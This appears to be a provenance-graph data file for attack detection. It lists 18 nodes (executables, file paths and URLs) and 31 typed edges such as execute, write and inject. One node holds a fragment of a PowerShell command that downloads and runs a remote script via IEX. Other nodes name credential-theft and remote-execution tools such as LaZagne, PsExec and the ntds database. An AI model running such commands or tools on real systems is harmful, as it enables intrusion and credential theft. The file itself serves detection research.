18
MP*-Order Confirmation.exe 
MP*-AcroRd32.exe 
SF-C:\Users\admin\AppData\Local\Temp\is-A62RJ.tmp
MF-c:\windows\ntds\ntds
SF-C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Crashpad
SO-https://bit.ly/44au7d6#firzain.html?od=1syq64a729d938110_vl_intervl_13s4.1hqpyxs.C0000ri8c0a1wgb06f_x11432.i8c0aMTU1d3d3LTFnMnAzbnQ0x697l
SO-https://www.youtube.com/@Omnidev_
MP-jsc.exe
SO-https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX
MF-C:\Users\admin\Desktop\265a5ffd91ee9ffc780e221ab78c655c10afb9fae8c870628155108856bc088e
SF-C:\Users\admin\AppData\Local\Temp\C3B1.exe
TF-C:\Windows\system32\wbengine.exe
SF-C:\Windows\system32\wbengine.exe
MP*-msbuild.exe
MF-LaZagne.exe
TP*-PsExec.exe
MF-C:\Program files\appdata\local\temp\17634
MP-csc.exe
31
0 1 FR-1
0 2 UK-1
1 3 EX-2
1 4 WR-2
1 5 ST-2
1 6 ST-2
1 7 FR-2
7 3 WR-2
7 4 WR-2
7 5 ST-2
7 6 ST-2
1 8 ST-2
7 8 ST-2
1 9 WR-2
7 9 RD-2
1 10 EX-2
7 10 WR-2
7 11 WR-2
7 12 WR-2
13 4 UK-3
7 14 WR-2
6 15 RF-2
7 15 IJ-2
15 8 ST-4
15 9 WR-4
15 10 UK-4
7 16 EX-2
8 17 RF-2
17 9 RD-4
17 11 RD-4
17 12 UK-4

